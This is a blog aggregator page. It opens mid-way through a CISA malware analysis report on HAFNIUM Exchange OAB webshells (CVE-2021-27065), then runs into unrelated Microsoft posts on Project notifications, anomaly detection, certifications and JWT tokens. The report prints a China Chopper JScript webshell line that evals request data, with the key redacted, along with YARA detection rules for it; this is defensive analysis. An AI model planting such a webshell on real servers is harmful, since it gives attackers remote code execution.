       Category = “Trojan WebShell Exploit CVE-2021-27065”
       Family = “HAFNIUM”
       Description = “Detects CVE-2021-27065 Exchange OAB VD MOD”
       MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
       SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
   strings:
       $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
       $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
       $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
   condition:
       $s0 and $s1 and $s2
}

ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB virtual directory is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB virtual directory.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the virtual directory from outside the firewall has been replaced with the following code:

—Begin Webshell—
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item[“[REDACTED]”])),”unsafe”);}</script>
—End Webshell—

Note: The hard-coded key used for authentication was redacted from the code above.

The script within the file decodes and executes data using the JavaScript “eval” function. The hard-coded key used for authentication was redacted from the code above. If the attacker is successful at accessing the script, they will be able to execute commands on the page with server (system) level privileges.

The file contains the following configuration data (sensitive data was redacted):

—Begin Configuration Data—
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS[:]//REDACTED.REDACTED.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 1713.5)
Server                         : REDACTED
InternalUrl                     : hxxps[:]//REDACTED.REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item[“[REDACTED]”])),”unsafe”);}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=REDACTED,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=REDACTED,DC=local
Identity                        : REDACTEDOAB (Default Web Site)
Guid                            : 06637895-089e-4332-8d55-cfc26d5f812a
ObjectCategory                 : REDACTED.local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/5/2021 2:48:16 PM
WhenCreated                     : 3/3/2021 9:00:53 AM
WhenChangedUTC                 : 3/5/2021 8:48:16 PM
WhenCreatedUTC                 : 3/3/2021 3:00:53 PM
OrganizationId                 :
Id                             : REDACTEDOAB (Default Web Site)
OriginatingServer             : REDACTED.REDACTED.local
IsValid                         : True
—End Configuration Data—

7a17f4c1e1a0c21ea5ed8837383b641c28244adb39c0a3f47da4d47ebe080271

Tags

trojanwebshell

Details

Name	discover.aspx
Size	2196 bytes
Type	HTML document, ASCII text, with CRLF line terminators
MD5	66daca742a53062d5828cb02e48ee53f
SHA1	25eb33b515f4bfdf704ed881fb11cd2ad1d345e6
SHA256	7a17f4c1e1a0c21ea5ed8837383b641c28244adb39c0a3f47da4d47ebe080271
SHA512	29d324a2024fd1f9dc30f9aa23e8dd8657839ad8aa2a1d46a76263b9030b3f8fa679cb5b9655dbb9dd04314e229382d9de39d48a4f6fdb40baf69bcf2e0500c7
ssdeep	24:kNrde9pr+rJTh91Q/PayH/56j0SzMaF8DVMr6j71idfh1hdN7wcjO2E4ONF0qkv4:kNrde+1BL0oM5QZ1hdNZw4ONF0qkg
Entropy	4.666697

Antivirus

Ahnlab	Exploit/ASP.Cve-2021-27065.S1406
Avira	EXP/CVE-2021-27065.1
BitDefender	Generic.ASP.WebShell.H.5499F873
ClamAV	Asp.Trojan.Webshell0321-9840176-0
Emsisoft	Generic.ASP.WebShell.H.5499F873 (B)
Ikarus	Exploit.ASP.CVE-2021-27065
Lavasoft	Generic.ASP.WebShell.H.5499F873
McAfee	Exploit-CVE2021-26855
Microsoft Security Essentials	Exploit:ASP/CVE-2021-27065
Quick Heal	CVE-2021-26855.Webshll.41350
Sophos	Troj/WebShel-L
Symantec	Trojan.Chinchop
TrendMicro	Backdoo.DDEA7357
TrendMicro House Call	Backdoo.DDEA7357
Vir.IT eXplorer	Exploit.Hafnium.I

YARA Rules

rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10328929”
       Date = “2021-03-17”
       Last_Modified = “20210317_2200”
       Actor = “n/a”
       Category = “Trojan WebShell Exploit CVE-2021-27065”
       Family = “HAFNIUM”
       Description = “Detects CVE-2021-27065 Webshellz”
       MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
       SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
   strings:
       $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
       $s1 = { 65 76 61 6C 28 }
       $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
       $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
   condition:
       $s0 or ($s1 and $s2) or ($s3 and $s4)
}
rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10328929”
       Date = “2021-03-17”
       Last_Modified = “20210317_2200”
       Actor = “n/a”
       Category = “Trojan WebShell Exploit CVE-2021-27065”
       Family = “HAFNIUM”
       Description = “Detects CVE-2021-27065 Exchange OAB VD MOD”
       MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
       SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
   strings:
       $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
       $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
       $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
   condition:
       $s0 and $s1 and $s2
}

ssdeep Matches

No matches found.

Description

—Begin Webshell—
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
—End Webshell—

Note: The hard-coded key used for authentication was redacted from the code above.

The file contains the following configuration data (sensitive data was redacted):

—Begin Configuration Data—
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS[:]//REDACTED.REDACTED.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 1713.5)
Server                         : REDACTED
InternalUrl                     : hxxps[:]//REDACTED.REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=REDACTED,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=REDACTED,DC=local
Identity                        : REDACTEDOAB (Default Web Site)
Guid                            : f04c8256-f0f3-44b8-b845-9690ded23ae1
ObjectCategory                 : REDACTED.local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/3/2021 9:00:33 AM
WhenCreated                     : 3/3/2021 12:55:49 AM
WhenChangedUTC                 : 3/3/2021 3:00:33 PM
WhenCreatedUTC                 : 3/3/2021 6:55:49 AM
OrganizationId                 :
Id                             : REDACTEDOAB (Default Web Site)
OriginatingServer             : REDACTED.REDACTED.local
IsValid                         : True
—End Configuration Data—

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Contact Information

Document FAQ

Can I submit malware to CISA? Malware samples can be submitted via three methods:

Updates on Microsoft Exchange Server Vulnerabilities

by Scott Muniz | Apr 12, 2021 | Security, Technology

This article is contributed. See the original author and article here.

Email Notifications in Project for the web

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

Based on the many requests from you, email notifications are now available for you to connect directly with coworkers on the work being tracked in Project. Your team members will get a notification once they have been assigned a task or have been added to a project.

How it works 

To turn on notifications:  

To reach the Project Home, type project.microsoft.com in the Search box of your browser.

Click the Settings icon in the top right corner of the page.

Click the Notifications Settings link.

Select the notification settings you want.

Click the Done button.

Scenarios to try

Assign a task:

In an existing shared project, create a task and assign it to one of your teammates.

Within 10 seconds, your teammate should receive an email with links to take them directly to the project or assigned task.

Create a new project:

Create a project normally in Project Home and assign a group to your project.

Group members should get an email within 10 seconds, notifying them that they’ve been added to a new group. They can use the link in the email to directly open the project.

Feedback 

If you have feedback about this or any other feature, you can let us know, either in the comments of this blog post or through our in-app feedback button. To submit feedback through the in-app button, click on the smile icon in the ribbon in Project. This will display three feedback options through which you can submit feedback. Please be sure to include your email so we can reach out to you if we have any follow ups about your comment.

Log Analytics Windows Agent for Winter 2021 now available

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

The Log Analytics Windows Agent for Winter 2021 is now available. This release contains a new troubleshooting tool and changes to how the agent handles certificate changes in Azure Services. Due to the certificate change, later this year, your agent will no longer be able to communicate with Azure and you will need to update to this version or later. We will announce specific timelines in a separate post soon. As always, we suggest using the latest agent available.

If you have installed the Log Analytics Agent for Windows by using Azure extensions and have automatic extension updates turned on, this update will be applied automatically. The latest release is also available to download from the Advanced Settings section in Log Analytics in the Azure portal.

More information

Review agent release notes. If you have questions, get answers from community experts in Microsoft Q&A. If you have a support plan and require technical support, please create a support request.

Meet a recent Microsoft Learn Student Ambassador graduate: Tarun Nanduri

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

Welcome to our series highlighting Microsoft Learn Student Ambassadors who achieved the Gold milestone and have recently graduated from their university. Each blog features a different student and highlight their accomplishments, their experience with the Student Ambassadors program, and what they’re up to now.

Today we’d like to introduce Tarun Nanduri, who graduated a few months ago from Pragati Engineering College in Surampalem, India.

Responses have been edited for clarity and length. 

Q: When you joined the program, did you have specific goals you wanted to reach, and did you achieve them? How has the program helped to prepare you for the next chapter in your life?

One thing is confidence. The amount of positivity or confidence that this program brings into the academic culture is very high–it’s unimaginable, I would say. I was always a confident guy, but then Microsoft Learn Student Ambassadors gave me a platform to talk with more and more people and build that foundation higher.

When I joined the program back in August 2017, the thing which excited me to join was to travel around India and also around the globe. To my fortune, I’ve traveled in my first year itself and also in my last year before graduating to Student Ambassador gatherings like the Gold Summit and the India Summit where I got to meet great program managers, and it was a whole lot of networking and a whole lot of idea sharing.

The other thing which excited me is Microsoft Azure. In 2017 I was not even aware of what the cloud is, how cloud development works,, but Microsoft Azure gave us a brilliant start. Giving students a USD100 credit allowed us to explore more and more on the cloud, deploy apps, and scale them out. It helped me know how cloud works and everything. Microsoft Azure is one of my favorite cloud platforms–it is the best thing I have learned from this community. Because of this program, I would say did I learn more about cloud computing and Azure.

Yes, it was a beautiful experience from 2017 to 2020.

Q: In the program, what was the one accomplishment that you’re the proudest of and why?

My very first event that I worked on as a Student Ambassador that I weill forever cherish was an interactive event, an hour of code in our college. 11 Student Ambassadors connected and made hour of code possible for more than 700 plus students at one time.

I’ve done multiple events, but one of my favorite events which I’m proud of is an Application Development workshop series. It’s a week or more with 80+ students each and every day coming in and out. Everything from A to Z, from organization to giving the certificates, it’s on me, including the talks. That was my greatest experience–sharing my knowledge and empowering juniors to learn more about Microsoft technologies and also technology as a whole. And letting them build their own on their own, letting their ideas materialize.

Q: So what have you been doing or what are you working on? What have you been up to since graduation?

I’m working as a software engineer at NCR Corporation. It’s been a good journey so far, and I hope I reach more and more heights. I believe in learning wherever we go. Go wherever, but never stop learning, that’s it. I’m enjoying my job at this moment, but my dream job would be to be like a CEO, like Sundar Pichai or Satya Nadella.

Q: If you could redo things, is there anything you would have done differently while in the program?

Not the whole term, but 2018 to 2019. I was quite passive then, so I didn’t do many events or didn’t participate or be active in the community. So I would like to redo that because the contributions I’ve made before and after gave me an opportunity to become a Gold Ambassador, so if I were the same way in 2018 and 2019, I would have reached many more heights.

Q: If you were to describe the Student Ambassadors program to a student who is considering joining, what would you say to them?

I would like to showcase myself as a real example of how the program transformed me from a college student who just passed +2 (editor’s note: the 2 year bridge between 10 years of primary/secondary schooling and undergraduate college) and became a graduate or a technology graduate. The amount of positivity that this brings into one’s academic career is unimaginable, so if you would like to make an impact, this is the right place for you.

Q: What advice would you give to new Student Ambassadors?

Talk with folks. Don’t be a single person doing all the things. Get some regional Student Ambassadors around you. Talk with them and do some community events together. Even though you’re knowledgeable, doing community events gives you fun and also gives you great experiences. That network matters a lot. You will enjoy the benefits once you graduate from the university.

Q: Do you have a motto, a guiding principle that drives you in life?

There are multiple things I believe in:

Never stop learning.

Sharing is learning, so learn as you share and share as you learn.

The more you know, the more you realize you don’t know. That played a good role in my development as a software engineer.

Good luck to you, Tarun, in your journey!

Service Fabric Community Q&A call 53

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

Starting in August 2020, we introduced a new framework for our monthly community sessions. In addition to our normal Q&A in each community call we will focus on topics related to various components of the Service Fabric platform, provide updates to roadmap, upcoming releases, and showcase solutions developed by our customers that benefit the community.

Agenda:

Backup Explorer

8.0: GA Stateless NodeTypes

Join us to learn more about one of the highly desired feature last week, how it works, and ask us any questions related to Service Fabric etc. This month’s Q&A features one session on:

April 15th 10:00am PST: https://aka.ms/sfcommunityqa

As usual, there is no need to RSVP – just navigate to the link to the call and you are in.

We have posted recordings of all our past Service Fabric Community call here.

Introducing Multivariate Anomaly Detection

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

Microsoft partners and customers have been building metrics monitoring solutions for AIOps and predictive maintenance, by leveraging the easy-to-use time-series anomaly detection Cognitive Service: Anomaly Detector. Because of its ability to analyze time-series individually, Anomaly Detector is benefiting the industry with its simplicity and scalability.

What’s new

We are pleased to announce the new multi-variate capability of Anomaly Detector. The new multivariate anomaly detection APIs in Anomaly Detector further enable developers to easily integrate advanced AI of detecting anomalies from groups of metrics into their applications without the need for machine learning knowledge or labeled data. Dependencies and inter-correlations between different signals are now counted as key factors. The new feature protects your mission-critical systems and physical assets, such as software applications, servers, factory machines, spacecraft, or even your business, from failures with a holistic view.

Imagine 20 sensors from an auto engine generating 20 different signals, e.g., vibration, temperature, etc. The readings of those signals individually may not tell you much on system-level issues, but together, could represent the health of the engine. When the synergy of those signals turns odd, the multivariate anomaly detection feature can sense the anomaly like a seasoned floor expert. Moreover, the AI models are trained and customized for your data such that it understands your business. With the new APIs in Anomaly Detector, developers can now easily integrate the multivariate time-series anomaly detection capabilities as well as the interpretability of the anomalies into predictive maintenance solutions, or AIOps monitoring solutions for complex enterprise software, or business intelligence tools.

Customer love

“Medical device production demands unprecedented precision. For this reason, the Siemens Healthineers team uses Multivariate Anomaly Detector (MVAD) in medical device stress tests during the final inspection in the production. We found MVAD easy to use and work almost out of the box with promising performance. With the ready-to-use model, we don’t need to develop a custom AD model, which ensures a short time to market. We plan to expand this technology also to other use cases. It is made easy due to good integration into our ML platform and processes.” – Dr. Jens Fürst, Head Digitalization and Automation at Siemens Healthineers

To better understand the health and condition of the aircraft and foresee and fix potential problems before they occur, Airbus deployed Anomaly Detector, part of Cognitive Services, to gather and analyze the telemetry data. It began as a proof of concept of the aircraft-monitoring application by loading telemetry data from multiple flights for analysis and model training. “Early tests have shown that for many cases, the out-of-the-box solution works beautifully, which helps us deploy our solutions faster. I would say that we save up to three months on development for our smaller use cases with Anomaly Detector.”
Marcel Rummens: Product Owner of Internal AI Platform, Airbus

AI horsepower

Time-series anomaly detection is an important research topic in data mining and has a wide range of applications in the industry. Efficient and accurate anomaly detection helps companies to monitor their key metrics continuously and alert for potential incidents on time. In many real-world applications like predictive maintenance and SpaceOps, multiple time-series metrics are collected to reflect the health status of a system. Univariate time-series anomaly detection algorithms can find anomalies for a single metric. However, it could be problematic in deciding whether the whole system is running normally. For example, sudden changes of a certain metric do not necessarily mean failures of the system. As shown in Figure 1, there are obvious boosts in the volume of TIMESERIES RECEIVED and DATA RECEIVED ON FLINK in the green segment, but the system is still in a healthy state as these two features share a consistent tendency. However, in the red segment, GC shows an inconsistent pattern with other metrics, indicating a problem in garbage collection. Consequently, it is essential to take the correlations between different time series into consideration in a multivariate time-series anomaly detection system.Fig.1

In this newly introduced feature, we productized a novel framework — MTAD-GAT (Multivariate Time-series Anomaly Detection via Graph Attention Network), to tackle the limitations of previous solutions. Our method considers each univariate time-series as an individual feature and tries to model the correlations between different features explicitly, while the temporal dependencies within each time-series are modeled at the same time. The key ingredients in our model are two graph attention layers, namely the feature-oriented graph attention layer and the time-oriented graph attention layer. The feature-oriented graph attention layer captures the causal relationships between multiple features, and the time-oriented graph attention layer underlines the dependencies along the temporal dimension. In addition, we jointly train a forecasting-based model and a reconstruction-based model for better representations of time-series data. The two models can be optimized simultaneously by a joint objective function.

The magic behind the scenes can be summarized as follows:

A novel framework to solve the multivariate time-series anomaly detection problem in a self-supervised manner. Our model shows superior performances on two public datasets and establishes state-of-the-art scores in the literature.

For the first time, we leverage two parallel graph attention (GAT) layers to learn the relationships between different time-series and timestamps dynamically. Especially, our model captures the correlations between different time-series successfully without any prior knowledge.

We integrate the advantages of both forecasting-based and reconstruction-based models by introducing a joint optimization target. The forecasting-based model focuses on single-timestamp prediction, while the reconstruction-based model learns a latent representation of the entire time-series.

Our network has good interpretability. We analyze the attention scores of multiple time-series learned by the graph attention layers, and the results correspond reasonably well to human intuition. We also show its capability of anomaly diagnosis.

Multivariate anomaly detection API overview

This new feature has a different workflow compared with the existing univariate feature. There are two phases to obtain the detection results, the training phase, and the inference phase. In the training phase, you need to provide some historical data to let the model learn past patterns. Then in the inference phase, you can call the inference API to acquire detection results of multivariate time-series in a given range.

APIs	Functionality
/multivariate/models	Create and train model using training data
/multivariate/models/{modelid}	Get model info including training status and parameters used in the model
multivariate/models[?$skip][&$top]	List models of a subscription
/multivariate/models/{modelid}/detect	Submit inference task with user’s data, this is async
/multivariate/results/{resultid}	Get anomalies + root causes (the contribution scores of each variate for each incident)
multivariate/models/{modelId}	Delete an existing multivariate model according to the modelId
multivariate/models/{modelId}/export	Export Multivariate Anomaly Detection Model as Zip file

Get started!

Learning more from our documentation

QuickStarts: C#, Python, JavaScript, Java

Artificial Intelligence for developers

Why you should celebrate your Microsoft skills and certifications

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

Earning new Microsoft Certifications and skills takes dedication; from completing courses and studying for the big day to finally passing the certification exam or putting new skills to work on the job, you deserve to celebrate your achievements.

Giving yourself a pat on the back and making sure others know you’ve put in all that effort not only feels good, it also empowers you to transform those additional tools into real benefits for your career. It ensures your professional network understands that you’re committed, hard-working, and talented enough to attain your career goals.

Letting peers know about your new skills and certifications can also increase your chances of getting ahead. Take LinkedIn for instance: Members listing at least five skills on their profiles are messaged up to 27 times more than those who don’t.¹

As Daniel Christian, a Microsoft MVP and certified trainer says, “When you earn certifications, in addition to the positive feeling you get, you can also put your badges on LinkedIn and your resume. It’s a simple action that can give you the edge you need to set yourself apart from other candidates – to prove that you’ve got something extra.”

Not only can you prove it, but you can also turn new knowledge and ability into added income. About 35% of technical professionals say getting certified led to salary or wage increases, and 26% report job promotions.² Gaining skills can also move your career forward; 87% of recruiters consider skills to be a critical factor when it comes to vetting candidates.³ These advantages come when your managers and others realize you have the capabilities and dedication to continuously learn.

Professional development also creates a measurable boost in confidence. IDC found that IT professionals who were certified were consistently more likely to believe they could learn difficult skills, with 91% of certified IT professionals believing that the effort employees put into acquiring new skills strongly contributes to their success.⁴

Wear your badge proudly

The first step to letting peers know about your achievement, as soon as you pass an exam or earn a certification, is through claiming a digital badge. Microsoft partners with Credly to award badges for certification achievements.

Digital badges give you authenticated digital representations of your achievements including an easily-recognized badge image and metadata uniquely linked to you and your achievement. Anyone looking at your information instantly sees your skills aligned to the certification and can verify the badge’s authenticity. You can share your digital badge on popular online sites, such as LinkedIn, Facebook, and Twitter, and embed it into your resume, personal website, or email signature. It’s an easy and objective way to prove you have what it takes to advance in your career.

One more tip to honor your achievements: keep them up to date. Don’t forget to periodically renew your certifications and update your skills. You can find a wealth of resources to refresh them on Microsoft Learn.

Related posts:

7 Lessons from a 24 year tech career

Is your certification expiring soon? Renew it for free today!

¹LinkedIn, “What You Need to Know To Get Hired This Month: September 2020”

²Microsoft, “10 reasons to earn a Microsoft certification,” 2020

³LinkedIn, “To Find Your Next Job More Quickly, Tell Your Community You’re Open to Work,” October 2020

⁴IDC white paper, sponsored by Microsoft, “Business Value of Digital Transformation and the Contribution of a Growth Mindset in IT,” May 2020.

Introduction to tokens

by Contributed | Apr 12, 2021 | Technology

This article is contributed. See the original author and article here.

Introduction

This article is written to explain OAuth 2.0 and OpenID Connect bearer tokens (JWT) and concepts relating to Microsoft Azure AD and related technologies, but can most likely be applied elsewhere too.

Tokens are everywhere on the Internet. Even if you don’t realise it, you may have just used one on the way to read this article! You may ask “What is a token and what do I need it for?” and my answer would be “Which token?”. You see, there are different types of tokens all with their use cases.

This article is here to break down the different types, how and when they are used and what a token is comprised of. Hopefully this article will help you better understand tokens and apply this to getting started with other technologies such as Microsoft Graph.

What is a token?

A token is a list claims of something. A real world analogy could be a receipt from a purchase of goods you made. Let’s say you needed to prove that you bought to goods to return something. The receipt would most likely contain the date of purchase, the price you paid and most importantly, the goods purchased. Essentially, you are making a claim of ownership using the receipt. A token works in a similar way – it is a way to claim “I am me” or “I am allowed to do this”.

Token types

As explained in the introduction, there are many different types of tokens. This article will concentrate on the 3 most commonly used tokens in Azure AD:

ID tokens

ID tokens are used by a client to provide a user’s identity. This is referred to as authentication. One example is a user entering their credentials in to a client and being given an ID token on sign-in success. By then having an ID token, the client then can access resources as the signed-in user without prompting the user.

Important Note: ID tokens should only be used for identity purposes and NOT be used to grant access to additional resources. This will be covered next

Access tokens

Access tokens are used by a client to obtain access to additional resources e.g. a protected API such as Microsoft Graph. This is referred to as authorization. With an access token, you can have a list of permissions (scopes) granted to you against a resource. You can then use these permissions in the access token to access protected resources that you would not be able to access with an ID token.

If you are still confused of the difference between authentication and authorization, @LuiseFreese sums it up perfectly:

The term “auth token” is widely used can become misleading as it could be interpreted as an authentication (ID) or authorization (access) token. It is important to distinguish the difference between the two and try to avoid using the term “auth token”.

Refresh tokens

Refresh tokens can be issued with ID and access tokens. Tokens have a fixed lifetime and expire, but with a refresh token a client can obtain a token without prompting the user for input. A basic example could be you are signed in to a client and it is using an access token with Microsoft Graph. On expiry of the access token, instead of interrupting the user, a new access token is silently obtained before the old access token expires using the refresh token from the original access token.

What makes up a token?

Let’s look at a sample token:

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjFMVE16YWtpaGlSbGFfOHoyQkVKVlhlV01xbyJ9.eyJ2ZXIiOiIyLjAiLCJpc3MiOiJodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZS5jb20vOTEyMjA0MGQtNmM2Ny00YzViLWIxMTItMzZhMzA0YjY2ZGFkL3YyLjAiLCJzdWIiOiJBQUFBQUFBQUFBQUFBQUFBQUFBQUFJa3pxRlZyU2FTYUZIeTc4MmJidGFRIiwiYXVkIjoiNmNiMDQwMTgtYTNmNS00NmE3LWI5OTUtOTQwYzc4ZjVhZWYzIiwiZXhwIjoxNTM2MzYxNDExLCJpYXQiOjE1MzYyNzQ3MTEsIm5iZiI6MTUzNjI3NDcxMSwibmFtZSI6IkFiZSBMaW5jb2xuIiwicHJlZmVycmVkX3VzZXJuYW1lIjoiQWJlTGlAbWljcm9zb2Z0LmNvbSIsIm9pZCI6IjAwMDAwMDAwLTAwMDAtMDAwMC02NmYzLTMzMzJlY2E3ZWE4MSIsInRpZCI6IjkxMjIwNDBkLTZjNjctNGM1Yi1iMTEyLTM2YTMwNGI2NmRhZCIsIm5vbmNlIjoiMTIzNTIzIiwiYWlvIjoiRGYyVVZYTDFpeCFsTUNXTVNPSkJjRmF0emNHZnZGR2hqS3Y4cTVnMHg3MzJkUjVNQjVCaXN2R1FPN1lXQnlqZDhpUURMcSFlR2JJRGFreXA1bW5PcmNkcUhlWVNubHRlcFFtUnA2QUlaOGpZIn0.1AFWW-Ck5nROwSlltm7GzZvDwUkqvhSQpm55TQsmVo9Y59cLhRXpvB8n-55HCr9Z6G_31_UbeUkoz612I2j_Sm9FFShSDDjoaLQr54CreGIJvjtmS3EkK9a7SJBbcpL1MpUtlfygow39tFjY7EVNW9plWUvRrTgVk7lYLprvfzw-CIqw3gHC-T7IK_m_xkr08INERBtaecwhTeN4chPC4W3jdmw_lIxzC48YoQ0dB1L9-ImX98Egypfrlbm0IBL5spFzL6JDZIRRJOu8vecJvj1mq-IUhGt0MacxX8jdxYLP-KUu2d9MbNKpCKJuZ7p8gwTL5B7NlUdh_dmSviPWrw

Makes sense, right? Of course not. All Azure AD tokens are also referred to as “JWTs” or JSON Web Tokens. This means that the token is formatted as a JSON object and then “base64Url” encoded and signed and with a bit of extra security (we’ll cover this soon), the end result is what we have above.

For an introduction in to JSON, I highly recommend Bob German’s article here.

Decoding a token

Taking the sample above and putting in in to jwt.ms, it is possible to decode from “base64url” back to human-readable JSON.

You will now see a JWT is made up of 3 parts:

Header (red text)

Payload (blue text)

Signature (green text)

In the next two sections, we’ll cover off each part.

Payload

A payload or body is the content of the token where the claims are stored. Most tokens contain standard claims such as:

“iss” – Identity of the service that issued the token e.g. https://login.microsoftonline.com/9122040d-6c67-4c5b-b112-36a304b66dad/v2.0

“sub” – The subject of the token e.g. the user

“aud” – The audience of the token, who the token is intended for. This is usually the client and not the user

“exp” – Expiry date of token in seconds since the Unix epoch

“iat” – Time token was issued (Unix epoch seconds)

“nbf” – Time token is valid from (Unix epoch seconds)

In addition to standard claims, there are custom claims in Azure AD tokens such as:

“name” – Name of the subject

“oid” – Azure AD object ID of the subject

“tid” – Azure AD tenant ID of the subject

One great feature of jwt.ms is that you can view detailed descriptions of standard and Azure AD claims.

Validating a token

You may be thinking: I just decoded a token on a webpage – how is that secure? JWTs are typically “signed” (not encrypted) with an algorithm and private key by the issuer of the token. This doesn’t stop any of the payload or header from being decoded as the aim of a token isn’t to hide information, but provide validity to it.

Never store secret information in a payload of a token as it can be easily decoded.

It is up to the recipient e.g. your client to validate the token to ensure it can be trusted.

There is a bit more nuance to the process than outlined here, but here is the summary on how to validate a token. Within the header part of the JWT, it contains the information on how the JWT was “signed” (what algorithm and private/public key pair was used). With this information it is possible for the client (if it has access to the public key) to validate the signature part of the JWT.

In addition to the signature, validation should also be taken place on the payload such as expiry time, audience and issuer.

Token usage

Now we are familiar with tokens. Let’s cover how they could be used in a couple of scenarios:

OpenID Connect

OpenID Connect is a way to sign a user in to an application. It is used for authentication only and not authorization. In this example, the end-user (user-agent) requests access to an application. The application requires authentication, so the end-user is redirected to authenticate at the authorization sever (I know, confusing). If successful, an ID token is returned and then validated by the application. If it passes validation, access is granted to the application.

OAuth 2.0 auth code grant

